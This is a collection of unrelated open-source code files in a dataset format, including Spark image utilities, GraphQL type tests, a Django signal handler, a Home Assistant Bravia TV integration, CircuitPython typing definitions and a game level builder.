        if isinstance(value, Settings):
            if 'key' in value and value.key in self.__constants:
                self.__add(key, self.__constants[value.key], prefix)
            elif 'default' in value:
                self.__add(key, value.default, prefix)
        else:
            self.__add(key, value, prefix)

    def add_port(self, name, settings, prefix=None):
        """Register ``<NAME>_PORT`` from the application's package settings."""
        port_key = '{}_PORT'.format(name.upper())
        port_value = getattr(settings.application.packages, name).port
        self.add(port_key, port_value, prefix)

    def __enter__(self):
        self.__data = {}
        return self

    def __exit__(self, *context):
        # Exceptions are not suppressed; the .env file is written regardless.
        root = get_package_root(self.__location)
        environment_path = os.path.join(root, '.env')
        # 'w' suffices (original opened 'w+' but never read back); one write
        # per variable instead of two produces identical file contents.
        with open(environment_path, 'w') as f:
            for key, value in self.__data.items():
                f.write('{}={}\n'.format(key, value))
| StarcoderdataPython |
1807312 | <reponame>kesavanvt/spark<gh_stars>1000+
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
.. attribute:: ImageSchema
An attribute of this module that contains the instance of :class:`_ImageSchema`.
.. autoclass:: _ImageSchema
:members:
"""
import sys
import numpy as np
from distutils.version import LooseVersion
from pyspark import SparkContext
from pyspark.sql.types import Row, _create_row, _parse_datatype_json_string
from pyspark.sql import SparkSession
__all__ = ["ImageSchema"]
class _ImageSchema(object):
    """
    Internal class for `pyspark.ml.image.ImageSchema` attribute. Meant to be private and
    not to be instantized. Use `pyspark.ml.image.ImageSchema` attribute to access the
    APIs of this class.
    """

    def __init__(self):
        # All values below are fetched lazily from the JVM on first property
        # access and cached for the lifetime of the singleton.
        self._imageSchema = None
        self._ocvTypes = None
        self._columnSchema = None
        self._imageFields = None
        self._undefinedImageType = None

    @property
    def imageSchema(self):
        """
        Returns the image schema.

        Returns
        -------
        :class:`StructType`
            with a single column of images named "image" (nullable)
            and having the same type returned by :meth:`columnSchema`.

        .. versionadded:: 2.3.0
        """
        if self._imageSchema is None:
            ctx = SparkContext._active_spark_context
            jschema = ctx._jvm.org.apache.spark.ml.image.ImageSchema.imageSchema()
            self._imageSchema = _parse_datatype_json_string(jschema.json())
        return self._imageSchema

    @property
    def ocvTypes(self):
        """
        Returns the OpenCV type mapping supported.

        Returns
        -------
        dict
            a dictionary containing the OpenCV type mapping supported.

        .. versionadded:: 2.3.0
        """
        if self._ocvTypes is None:
            ctx = SparkContext._active_spark_context
            self._ocvTypes = dict(ctx._jvm.org.apache.spark.ml.image.ImageSchema.javaOcvTypes())
        return self._ocvTypes

    @property
    def columnSchema(self):
        """
        Returns the schema for the image column.

        Returns
        -------
        :class:`StructType`
            a schema for image column,
            ``struct<origin:string, height:int, width:int, nChannels:int, mode:int, data:binary>``.

        .. versionadded:: 2.4.0
        """
        if self._columnSchema is None:
            ctx = SparkContext._active_spark_context
            jschema = ctx._jvm.org.apache.spark.ml.image.ImageSchema.columnSchema()
            self._columnSchema = _parse_datatype_json_string(jschema.json())
        return self._columnSchema

    @property
    def imageFields(self):
        """
        Returns field names of image columns.

        Returns
        -------
        list
            a list of field names.

        .. versionadded:: 2.3.0
        """
        if self._imageFields is None:
            ctx = SparkContext._active_spark_context
            self._imageFields = list(ctx._jvm.org.apache.spark.ml.image.ImageSchema.imageFields())
        return self._imageFields

    @property
    def undefinedImageType(self):
        """
        Returns the name of undefined image type for the invalid image.

        .. versionadded:: 2.3.0
        """
        if self._undefinedImageType is None:
            ctx = SparkContext._active_spark_context
            self._undefinedImageType = \
                ctx._jvm.org.apache.spark.ml.image.ImageSchema.undefinedImageType()
        return self._undefinedImageType

    def toNDArray(self, image):
        """
        Converts an image to an array with metadata.

        Parameters
        ----------
        image : :class:`Row`
            image: A row that contains the image to be converted. It should
            have the attributes specified in `ImageSchema.imageSchema`.

        Returns
        -------
        :class:`numpy.ndarray`
            that is an image.

        .. versionadded:: 2.3.0
        """
        if not isinstance(image, Row):
            raise TypeError(
                "image argument should be pyspark.sql.types.Row; however, "
                "it got [%s]." % type(image))

        if any(not hasattr(image, f) for f in self.imageFields):
            raise ValueError(
                "image argument should have attributes specified in "
                "ImageSchema.imageSchema [%s]." % ", ".join(self.imageFields))

        height = image.height
        width = image.width
        nChannels = image.nChannels
        # Interpret the flat byte buffer as an HxWxC row-major array: one row
        # spans width * nChannels bytes, one pixel spans nChannels bytes.
        return np.ndarray(
            shape=(height, width, nChannels),
            dtype=np.uint8,
            buffer=image.data,
            strides=(width * nChannels, nChannels, 1))

    def toImage(self, array, origin=""):
        """
        Converts an array with metadata to a two-dimensional image.

        Parameters
        ----------
        array : :class:`numpy.ndarray`
            The array to convert to image.
        origin : str
            Path to the image, optional.

        Returns
        -------
        :class:`Row`
            that is a two dimensional image.

        .. versionadded:: 2.3.0
        """
        if not isinstance(array, np.ndarray):
            raise TypeError(
                "array argument should be numpy.ndarray; however, it got [%s]." % type(array))

        if array.ndim != 3:
            raise ValueError("Invalid array shape")

        height, width, nChannels = array.shape
        # Map the channel count to the matching 8-bit OpenCV image mode.
        ocvTypes = ImageSchema.ocvTypes
        if nChannels == 1:
            mode = ocvTypes["CV_8UC1"]
        elif nChannels == 3:
            mode = ocvTypes["CV_8UC3"]
        elif nChannels == 4:
            mode = ocvTypes["CV_8UC4"]
        else:
            raise ValueError("Invalid number of channels")

        # Running `bytearray(numpy.array([1]))` fails in specific Python versions
        # with a specific Numpy version, for example in Python 3.6.0 and NumPy 1.13.3.
        # Here, it avoids it by converting it to bytes.
        if LooseVersion(np.__version__) >= LooseVersion('1.9'):
            data = bytearray(array.astype(dtype=np.uint8).ravel().tobytes())
        else:
            # Numpy prior to 1.9 don't have `tobytes` method.
            data = bytearray(array.astype(dtype=np.uint8).ravel())

        # Creating new Row with _create_row(), because Row(name = value, ... )
        # orders fields by name, which conflicts with expected schema order
        # when the new DataFrame is created by UDF
        return _create_row(self.imageFields,
                           [origin, height, width, nChannels, mode, data])
ImageSchema = _ImageSchema()
# Monkey patch to disallow instantiation of this class.
def _disallow_instance(_):
raise RuntimeError("Creating instance of _ImageSchema class is disallowed.")
_ImageSchema.__init__ = _disallow_instance
def _test():
    """Run this module's doctests against a local two-core Spark session."""
    import doctest
    import pyspark.ml.image

    test_globals = pyspark.ml.image.__dict__.copy()
    session = (
        SparkSession.builder
        .master("local[2]")
        .appName("ml.image tests")
        .getOrCreate()
    )
    test_globals['spark'] = session
    failure_count, _test_count = doctest.testmod(
        pyspark.ml.image,
        globs=test_globals,
        optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
    )
    session.stop()
    if failure_count:
        sys.exit(-1)


if __name__ == "__main__":
    _test()
| StarcoderdataPython |
3490334 | from graphql.type import (
GraphQLField,
GraphQLFloat,
GraphQLInt,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLOutputType,
GraphQLSchema,
GraphQLString,
GraphQLUnionType,
)
from graphql.utilities import is_equal_type, is_type_sub_type_of
def describe_type_comparators():
    """pytest-describe suite for ``graphql.utilities`` type comparators.

    NOTE: the nested function names are the collected test names under the
    pytest-describe convention — do not rename them casually.
    """

    def describe_is_equal_type():
        def same_references_are_equal():
            assert is_equal_type(GraphQLString, GraphQLString) is True

        def int_and_float_are_not_equal():
            assert is_equal_type(GraphQLInt, GraphQLFloat) is False

        def lists_of_same_type_are_equal():
            assert (
                is_equal_type(GraphQLList(GraphQLInt), GraphQLList(GraphQLInt)) is True
            )

        def lists_is_not_equal_to_item():
            assert is_equal_type(GraphQLList(GraphQLInt), GraphQLInt) is False

        def nonnull_of_same_type_are_equal():
            assert (
                is_equal_type(GraphQLNonNull(GraphQLInt), GraphQLNonNull(GraphQLInt))
                is True
            )

        def nonnull_is_not_equal_to_nullable():
            assert is_equal_type(GraphQLNonNull(GraphQLInt), GraphQLInt) is False

    def describe_is_type_sub_type_of():
        # Helper (not collected: no describe_/test-style name): a minimal
        # schema whose single query field has the given output type.
        def _test_schema(field_type: GraphQLOutputType = GraphQLString):
            return GraphQLSchema(
                query=GraphQLObjectType("Query", {"field": GraphQLField(field_type)})
            )

        def same_reference_is_subtype():
            assert (
                is_type_sub_type_of(_test_schema(), GraphQLString, GraphQLString)
                is True
            )

        def int_is_not_subtype_of_float():
            assert (
                is_type_sub_type_of(_test_schema(), GraphQLInt, GraphQLFloat) is False
            )

        def non_null_is_subtype_of_nullable():
            assert (
                is_type_sub_type_of(
                    _test_schema(), GraphQLNonNull(GraphQLInt), GraphQLInt
                )
                is True
            )

        def nullable_is_not_subtype_of_non_null():
            assert (
                is_type_sub_type_of(
                    _test_schema(), GraphQLInt, GraphQLNonNull(GraphQLInt)
                )
                is False
            )

        def item_is_not_subtype_of_list():
            assert not is_type_sub_type_of(
                _test_schema(), GraphQLInt, GraphQLList(GraphQLInt)
            )

        def list_is_not_subtype_of_item():
            assert not is_type_sub_type_of(
                _test_schema(), GraphQLList(GraphQLInt), GraphQLInt
            )

        def member_is_subtype_of_union():
            member = GraphQLObjectType("Object", {"field": GraphQLField(GraphQLString)})
            union = GraphQLUnionType("Union", [member])
            schema = _test_schema(union)
            assert is_type_sub_type_of(schema, member, union)

        def implementation_is_subtype_of_interface():
            iface = GraphQLInterfaceType(
                "Interface", {"field": GraphQLField(GraphQLString)}
            )
            impl = GraphQLObjectType(
                "Object",
                fields={"field": GraphQLField(GraphQLString)},
                interfaces=[iface],
            )
            schema = _test_schema(impl)
            assert is_type_sub_type_of(schema, impl, iface)
| StarcoderdataPython |
9766757 | import pandas as pd
import argparse
if __name__ == '__main__':
    # Merge several per-file (title, author, pub_year) tallies into a single
    # deduplicated count table, sorted by frequency and then by year.
    arg_parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    arg_parser.add_argument('-i', '--input', required=True, nargs='+',
                            type=str, dest="input")
    arg_parser.add_argument('-o', '--output', required=True, type=str,
                            dest="output")
    options = arg_parser.parse_args()

    key_cols = ["title", "author", "pub_year"]
    frames = []
    for csv_path in options.input:
        frames.append(pd.read_csv(csv_path).groupby(key_cols).size().reset_index())
    merged = pd.concat(frames)
    merged = merged.groupby(key_cols).size().reset_index(name='counts')
    merged = merged.sort_values(by=["counts", "pub_year"], ascending=False)
    merged.to_csv(options.output, index=False)
| StarcoderdataPython |
3221545 | from django.db.models import signals
from django.dispatch import receiver
from sales.models import ReceiptLine
# @receiver(signals.pre_delete,sender=ReceiptLine)
# def delete_status(sender,instance,*args,**kwargs):
# print ('deleting invoice status')
# inv=instance.invoice
# if inv.balance-instance.amount == 0 :
# inv.status = "Unpaid"
# elif inv.balance-instance.amount > 0:
# inv.status = "PartiallyPaid"
# else :
# inv.status = "Error"
# inv.save()
# print('updating receipt Amount')
# rec = instance.receipt
# rec.total -= instance.amount
# rec.save()
@receiver(signals.post_delete, sender=ReceiptLine)
def delete_status(sender, instance, *args, **kwargs):
    """post_delete handler: re-derive an invoice's paid status after a receipt line is removed."""
    print('deleting invoice status')
    invoice = instance.invoice
    print(f"in bal :{invoice.get_balance()}")
    # Balance back at the full invoice amount means nothing has been paid.
    if invoice.get_balance() == invoice.balance:
        invoice.status = "Unpaid"
    else:
        invoice.status = "PartialPaid"
    invoice.save()
# print('updating receipt Amount')
# rec = instance.receipt
# rec.total -= instance.amount
# rec.save()
# these following lines must go since these eat up receipt amount on delete
# a=instance.receipt.total-instance.amount
# Receipt.objects.filter(id=instance.receipt.id).update(total=a)
# decoupling receipt allotment
# @receiver(signals.post_save,sender=Receipt)
# def allot_receipt(sender,instance=None,created=False,*args,**kwargs):
#
# if not instance:
# return
#
# if hasattr(instance, '_dirty'):
# return
#
# print(f"allotting receipt {instance.id} amount: {instance.total}")
# amount=instance.total
# invpaid = 0 if instance.get_line_totals() is None else instance.get_line_totals()
# print(f"invpaid{invpaid}")
# amount = amount - invpaid
# print(f"amount : {amount}")
# try:
# invtopay = Invoice.objects.filter(customer=instance.customer,balancetype=instance.type).exclude(status="Paid").order_by('created')
# except IndexError:
# invtopay = None
# print(invtopay)
# for i in invtopay:
# print(f"i:{i} bal:{i.get_balance()}")
# if amount<=0 : break
# bal=i.get_balance()
# if amount >= bal :
# amount -= bal
# ReceiptLine.objects.create(receipt=instance,invoice=i,amount=bal)
# i.status="Paid"
# else :
# ReceiptLine.objects.create(receipt=instance,invoice=i,amount=amount)
# i.status="PartiallyPaid"
# amount=0
# i.save()
# print('allotted receipt')
# try:
# instance._dirty = True
# instance.save()
# finally:
# del instance._dirty
# @receiver(signals.pre_delete,sender = InvoiceItem)
# def submit_stock(sender,instance,*args,**kwargs):
# if instance.invoice.posted:
# instance.unpost()
| StarcoderdataPython |
3541555 | <filename>Lib/site-packages/pyqt_units/MeasurementDatabase.py
#Created on 12 Aug 2014
#@author: neil.butcher
import os
from shutil import copyfile
# Paths to the pristine template database and the runtime working copy.
root_filename = os.path.join(os.path.dirname(__file__), 'measurements', 'measurements_root.db')
filename = os.path.join(os.path.dirname(__file__), 'measurements', 'measurements_temp.db')
# Seed the working copy from the template on first import only; an existing
# working copy (possibly holding user changes) is never overwritten.
if not os.path.isfile(filename):
    copyfile(root_filename, filename)
| StarcoderdataPython |
6489214 | from flask import jsonify
from flask_restful import Resource, request
from ..util.user import User
from ..util.dbutil import get_user,get_sensors,set_sensors,set_user
import json
class Profile(Resource):
    """REST resource exposing a user's profile data and sensor bindings."""

    def get(self):
        """Return the profile-page data for the requested user as JSON."""
        # The front end passes the username via URL query parameters.
        username = request.args.get("username")
        print(str(username)+'查看个人页面')
        user = get_user(username)
        sensors = get_sensors(username)
        # Each entry pairs a user-facing display label ("information", a
        # Chinese UI string that must stay as-is) with its value ("content").
        data = {"name": {"information": "用户名:", "content": user.username},
                "phone": {"information": "电话号码:", "content": user.phonenum},
                "dorm": {"information": "宿舍楼:", "content": user.dorm},
                "room": {"information": "寝室号:", "content": user.room},
                "campus": {"information": "校区:", "content": user.campus},
                "temp": {"information": "温度源:", "content": sensors[0]},
                "humi": {"information": "湿度源:", "content": sensors[1]},
                "video": {"information": "视频源:", "content": user.rpiname}}
        print(json.dumps(data))
        #return json.dumps(data)
        return jsonify(data)

    def post(self):
        """Update the user's profile and sensor bindings from the JSON body.

        Returns 1 on success, -1 if updating the sensors failed, -2 if
        updating the user failed.

        NOTE(review): falls through with no return (None) when the body has
        a falsy/absent ``username`` — confirm the intended response.
        """
        data = request.get_json()
        if data["username"]:
            user = User()
            user.username = data["username"]
            user.phonenum = data["phonenum"]
            user.dorm = data["dorm"]
            user.room = data["room"]
            user.campus = data["campus"]
            user.rpiname = data["video"]
            s_list = [data["temp"], data["humi"]]
            if set_user(user):
                if set_sensors(user.username, s_list):
                    return 1  # success
                return -1  # updating the sensors failed
            return -2  # updating the user failed
| StarcoderdataPython |
6447620 | # SPDX-FileCopyrightText: Copyright (c) 2022 <NAME> for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`circuitpython_typing`
================================================================================
Types needed for type annotation that are not in `typing`
* Author(s): <NAME>, <NAME>, <NAME>
"""
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Typing.git"
import array
from typing import Union, Optional
# Protocol was introduced in Python 3.8.
try:
from typing import Protocol # pylint: disable=ungrouped-imports
except ImportError:
from typing_extensions import Protocol
# Lists below are alphabetized.
# More added in each conditional import.
__all__ = [
"Alarm",
"AudioSample",
"ByteStream",
"FrameBuffer",
"ReadableBuffer",
"WriteableBuffer",
]
ReadableBuffer = Union[
array.array,
bytearray,
bytes,
memoryview,
"rgbmatrix.RGBMatrix",
"ulab.numpy.ndarray",
]
"""Classes that implement the readable buffer protocol."""
WriteableBuffer = Union[
array.array,
bytearray,
memoryview,
"rgbmatrix.RGBMatrix",
"ulab.numpy.ndarray",
]
"""Classes that implement the writeable buffer protocol."""
class ByteStream(Protocol):
    """Protocol for basic I/O operations on a byte stream.

    Classes which implement this protocol include

    * `io.BytesIO`
    * `io.FileIO` (for a file open in binary mode)
    * `busio.UART`
    * `usb_cdc.Serial`
    """

    # Structural type (PEP 544): any class providing matching read/write
    # satisfies this protocol; the `...` bodies only declare the interface.

    # Should be `, /)`, but not available in Python 3.7.
    def read(self, count: Optional[int] = None) -> Optional[bytes]:
        """Read ``count`` bytes from the stream.

        If ``count`` bytes are not immediately available,
        or if the parameter is not specified in the call,
        the outcome is implementation-dependent.
        """
        ...

    # Should be `, /)`, but not available in Python 3.7.
    def write(self, buf: ReadableBuffer) -> Optional[int]:
        """Write the bytes in ``buf`` to the stream."""
        ...
# These types may not be in adafruit-blinka, so use the string form instead of a resolved name.
AudioSample = Union[
"audiocore.WaveFile",
"audiocore.RawSample",
"audiomixer.Mixer",
"audiomp3.MP3Decoder",
"synthio.MidiTrack",
]
"""Classes that implement the audiosample protocol.
You can play these back with `audioio.AudioOut`, `audiobusio.I2SOut` or `audiopwmio.PWMAudioOut`.
"""
FrameBuffer = Union["rgbmatrix.RGBMatrix"]
"""Classes that implement the framebuffer protocol."""
Alarm = Union["alarm.pin.PinAlarm", "alarm.time.TimeAlarm"]
"""Classes that implement alarms for sleeping and asynchronous notification.
You can use these alarms to wake up from light or deep sleep.
"""
| StarcoderdataPython |
1693630 | <reponame>frankmakesthecode/core
"""The Bravia TV component."""
import asyncio
from datetime import timedelta
import logging
from bravia_tv import BraviaRC
from bravia_tv.braviarc import NoIPControl
from homeassistant.components.media_player import DOMAIN as MEDIA_PLAYER_DOMAIN
from homeassistant.components.remote import DOMAIN as REMOTE_DOMAIN
from homeassistant.const import CONF_HOST, CONF_MAC, CONF_PIN
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CLIENTID_PREFIX, CONF_IGNORED_SOURCES, DOMAIN, NICKNAME
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [MEDIA_PLAYER_DOMAIN, REMOTE_DOMAIN]
SCAN_INTERVAL = timedelta(seconds=10)
async def async_setup_entry(hass, config_entry):
    """Set up a config entry."""
    host = config_entry.data[CONF_HOST]
    mac = config_entry.data[CONF_MAC]
    pin = config_entry.data[CONF_PIN]
    ignored_sources = config_entry.options.get(CONF_IGNORED_SOURCES, [])

    coordinator = BraviaTVCoordinator(hass, host, mac, pin, ignored_sources)
    # Reload the entry whenever its options change (see update_listener).
    config_entry.async_on_unload(config_entry.add_update_listener(update_listener))

    # Performs the first poll; aborts setup if the TV cannot be reached.
    await coordinator.async_config_entry_first_refresh()

    hass.data.setdefault(DOMAIN, {})
    hass.data[DOMAIN][config_entry.entry_id] = coordinator

    hass.config_entries.async_setup_platforms(config_entry, PLATFORMS)

    return True
async def async_unload_entry(hass, config_entry):
    """Unload a config entry, dropping its coordinator on success."""
    unloaded = await hass.config_entries.async_unload_platforms(
        config_entry, PLATFORMS
    )
    if unloaded:
        hass.data[DOMAIN].pop(config_entry.entry_id)
    return unloaded
async def update_listener(hass, config_entry):
    """Handle options update."""
    # Re-create the integration so new options (e.g. ignored sources) apply.
    await hass.config_entries.async_reload(config_entry.entry_id)
class BraviaTVCoordinator(DataUpdateCoordinator[None]):
    """Representation of a Bravia TV Coordinator.

    An instance is used per device to share the same power state between
    several platforms.
    """

    def __init__(self, hass, host, mac, pin, ignored_sources):
        """Initialize Bravia TV Client."""

        self.braviarc = BraviaRC(host, mac)
        self.pin = pin
        self.ignored_sources = ignored_sources
        # The attributes below cache the most recent poll of the TV state.
        self.muted = False
        self.program_name = None
        self.channel_name = None
        self.channel_number = None
        self.source = None
        self.source_list = []
        self.original_content_list = []
        self.content_mapping = {}
        self.duration = None
        self.content_uri = None
        self.start_date_time = None
        self.program_media_type = None
        self.audio_output = None
        self.min_volume = None
        self.max_volume = None
        self.volume = None
        self.is_on = False
        # Assume that the TV is in Play mode
        self.playing = True
        # Held while a command is in flight so polling does not interleave.
        self.state_lock = asyncio.Lock()

        super().__init__(
            hass,
            _LOGGER,
            name=DOMAIN,
            update_interval=SCAN_INTERVAL,
            # Collapse bursts of refresh requests (e.g. right after commands).
            request_refresh_debouncer=Debouncer(
                hass, _LOGGER, cooldown=1.0, immediate=False
            ),
        )

    def _send_command(self, command, repeats=1):
        """Send a command to the TV."""
        for _ in range(repeats):
            for cmd in command:
                self.braviarc.send_command(cmd)

    def _get_source(self):
        """Return the name of the source."""
        # Reverse lookup of the current content URI; implicitly returns None
        # when the URI is not in the known source mapping.
        for key, value in self.content_mapping.items():
            if value == self.content_uri:
                return key

    def _refresh_volume(self):
        """Refresh volume information."""
        volume_info = self.braviarc.get_volume_info(self.audio_output)
        if volume_info is not None:
            self.audio_output = volume_info.get("target")
            self.volume = volume_info.get("volume")
            self.min_volume = volume_info.get("minVolume")
            self.max_volume = volume_info.get("maxVolume")
            self.muted = volume_info.get("mute")
            return True
        return False

    def _refresh_channels(self):
        """Refresh source and channels list."""
        # The source list is loaded only once and cached afterwards.
        if not self.source_list:
            self.content_mapping = self.braviarc.load_source_list()
            self.source_list = []
            if not self.content_mapping:
                return False
            # Skip sources the user chose to hide via the integration options.
            for key in self.content_mapping:
                if key not in self.ignored_sources:
                    self.source_list.append(key)
        return True

    def _refresh_playing_info(self):
        """Refresh playing information."""
        playing_info = self.braviarc.get_playing_info()
        self.program_name = playing_info.get("programTitle")
        self.channel_name = playing_info.get("title")
        self.program_media_type = playing_info.get("programMediaType")
        self.channel_number = playing_info.get("dispNum")
        self.content_uri = playing_info.get("uri")
        self.source = self._get_source()
        self.duration = playing_info.get("durationSec")
        self.start_date_time = playing_info.get("startDateTime")
        # An empty payload means an app (not a channel/input) is in front.
        if not playing_info:
            self.channel_name = "App"

    def _update_tv_data(self):
        """Connect and update TV info."""
        power_status = self.braviarc.get_power_status()
        if power_status != "off":
            connected = self.braviarc.is_connected()
            if not connected:
                try:
                    connected = self.braviarc.connect(
                        self.pin, CLIENTID_PREFIX, NICKNAME
                    )
                except NoIPControl:
                    _LOGGER.error("IP Control is disabled in the TV settings")
            if not connected:
                # Treat an unreachable TV the same as powered off.
                power_status = "off"
        if power_status == "active":
            self.is_on = True
            if self._refresh_volume() and self._refresh_channels():
                self._refresh_playing_info()
            return
        self.is_on = False

    async def _async_update_data(self):
        """Fetch the latest data."""
        # Skip the scheduled poll entirely while a command holds the lock.
        if self.state_lock.locked():
            return

        await self.hass.async_add_executor_job(self._update_tv_data)

    async def async_turn_on(self):
        """Turn the device on."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.turn_on)
            await self.async_request_refresh()

    async def async_turn_off(self):
        """Turn off device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.turn_off)
            await self.async_request_refresh()

    async def async_set_volume_level(self, volume):
        """Set volume level, range 0..1."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(
                self.braviarc.set_volume_level, volume, self.audio_output
            )
            await self.async_request_refresh()

    async def async_volume_up(self):
        """Send volume up command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(
                self.braviarc.volume_up, self.audio_output
            )
            await self.async_request_refresh()

    async def async_volume_down(self):
        """Send volume down command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(
                self.braviarc.volume_down, self.audio_output
            )
            await self.async_request_refresh()

    async def async_volume_mute(self, mute):
        """Send mute command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.mute_volume, mute)
            await self.async_request_refresh()

    async def async_media_play(self):
        """Send play command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.media_play)
            self.playing = True
            await self.async_request_refresh()

    async def async_media_pause(self):
        """Send pause command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.media_pause)
            self.playing = False
            await self.async_request_refresh()

    async def async_media_stop(self):
        """Send stop command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.media_stop)
            self.playing = False
            await self.async_request_refresh()

    async def async_media_next_track(self):
        """Send next track command."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.media_next_track)
            await self.async_request_refresh()

    async def async_media_previous_track(self):
        """Send previous track command."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self.braviarc.media_previous_track)
            await self.async_request_refresh()

    async def async_select_source(self, source):
        """Set the input source."""
        # Unknown source names are silently ignored.
        if source in self.content_mapping:
            uri = self.content_mapping[source]
            async with self.state_lock:
                await self.hass.async_add_executor_job(self.braviarc.play_content, uri)
                await self.async_request_refresh()

    async def async_send_command(self, command, repeats):
        """Send command to device."""
        async with self.state_lock:
            await self.hass.async_add_executor_job(self._send_command, command, repeats)
            await self.async_request_refresh()
| StarcoderdataPython |
6475687 | import LevelBuilder
from sprites import *
"""
### Creating builder ###
level: lb = LevelBuilder.LevelBuilder("level_34.plist")
### Adding sprites ###
Hero: lb.addObject(Hero.HeroSprite(x=20,y=10))
Rotor: lb.addObject(Rotor.RotorSprite(x=180,y=110,speed=5,torque=10000))
Bucket: lb.addObject(EnemyBucketWithStar.EnemyBucketWithStarSprite(width=100,height=75, x=240, y=160, num_enemies=10, enemy_size=20))
Launcher: lb.addObject(Launcher.LauncherSprite(name='__launcher__1',x=260, y=50, trigger_x=400, trigger_y=100))
Beam: lb.addObject(Beam.BeamSprite(x=240+40,y=25,width=30,height=60,static='true',angle=0))
Nut: lb.addObject(Nut.NutSprite(x=50,y=200))
Enemy: lb.addObject(Enemy.EnemySprite(x=240,y=200,width=50,height=50))
Friend: lb.addObject(Friend.FriendSprite(x=240,y=125,width=128,height=128))
Wizard: lb.addObject(Wizard.WizardSprite(x=25,y=50))
Spikey: lb.addObject(SpikeyBuddy.SpikeyBuddySprite(x=50,y=80,width=50,height=50))
EnemyEquipedRotor: lb.addObject(EnemyEquipedRotor.EnemyEquipedRotorSprite(x=160,y=240,speed=2,torque=10000))
CyclingEnemyObject : CyclingEnemyObject.CyclingEnemyObjectSprite(name='num1',x=240,y=160,width=120,height=120,enemy_size=40)
### Custom names ###
Setting custom Name (for joints and Contact defs): Hero.HeroSprite(x=20,y=10).setName("piet")
### Adding Joints ###
RevJoint: revJoint = Joints.RevoluteJoint(body1='body_1',body2='body_2',motor_speed='50.0',torque='1000.0',enable_motor='true',lower_angle='12',upper_angle='45',enable_limit='false',collide_connected='false')
lb.addObject(revJoint)
PrismJoint: prismJoint = Joints.PrismaticJoint(body1='body_1',motor_speed='50.0',torque='1000.0',enable_motor='true',lower_translation='-100',upper_translation='100',enable_limit='false',vertical=False)
lb.addObject(prismJoint)
DistJoint: distJoint = Joints.DistanceJoint(body1='body_1',body2='body_2',damping='0.2',freq='0.8')
lb.addObject(distJoint)
### Adding Contacts ###
Contact: Contacts.Contact(body1='test',body2='test2',event_name='onTest')
lb.render()
"""
def render(name, bg):
    """Build the level and write it out as ``<name>.plist``.

    Layout: the hero starts bottom-left; the friend and star sit on a high
    perch; nuts are scattered along the approach; two tilted beams hold back
    three piles of enemies that collapse when disturbed.

    :param name: output file name without the ``.plist`` extension.
    :param bg: background identifier passed through to the LevelBuilder.
    """
    builder = LevelBuilder.LevelBuilder(name + ".plist", background=bg)

    # Player, goal character and the star tethered above it.
    builder.addObject(Hero.HeroSprite(x=20, y=10))
    builder.addObject(Friend.FriendSprite(x=213, y=320, width=15, height=15, static='true'))
    builder.addObject(Star.StarSprite(x=213, y=300, width=32, height=32))

    # Collectible nuts: a handful of landmarks plus a row of 15 across y=180.
    # All fire the same 'onNutHitAll' event when collected.
    nut_positions = [(15, 160), (205, 300), (225, 300), (460, 136), (240, 30)]
    nut_positions += [(90 + 20 * i, 180) for i in range(15)]
    for nut_x, nut_y in nut_positions:
        builder.addObject(Nut.NutSprite(x=nut_x, y=nut_y, eventName='onNutHitAll'))

    # Two main beams holding back the loads of enemies stacked above them.
    builder.addObject(Beam.BeamSprite(x=104, y=245, width=250, height=20, static='false', angle=35))
    builder.addObject(Beam.BeamSprite(x=350, y=240, width=310, height=20, static='false', angle=-35, density=1))

    # Three enemy piles resting on the beams: (spawn_x, spawn_y, count).
    for spawn_x, spawn_y, count in ((40, 300, 15), (380, 290, 10), (430, 300, 13)):
        for _ in range(count):
            builder.addObject(Enemy.EnemySprite(x=spawn_x, y=spawn_y, width=32, height=32, density=2))

    # A loose row of single enemies around x=240 at mid height.
    for offset in (-20, 20, 80, -60, -120):
        builder.addObject(Enemy.EnemySprite(x=240 + offset, y=200, width=32, height=32, density=2))

    # One oversized enemy and a bouncy spiked hazard near the ground.
    builder.addObject(Enemy.EnemySprite(x=390, y=64, width=128, height=128, density=2))
    builder.addObject(SpikeyBuddy.SpikeyBuddySprite(x=320, y=20, width=40, height=40, density=6, restitution=0.6))

    # Tether the star to the friend with a soft distance joint.
    builder.addObject(Joints.DistanceJoint(body1='Star', body2='Friend', damping='0.2', freq='0.8'))
    builder.render()
| StarcoderdataPython |
3375434 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
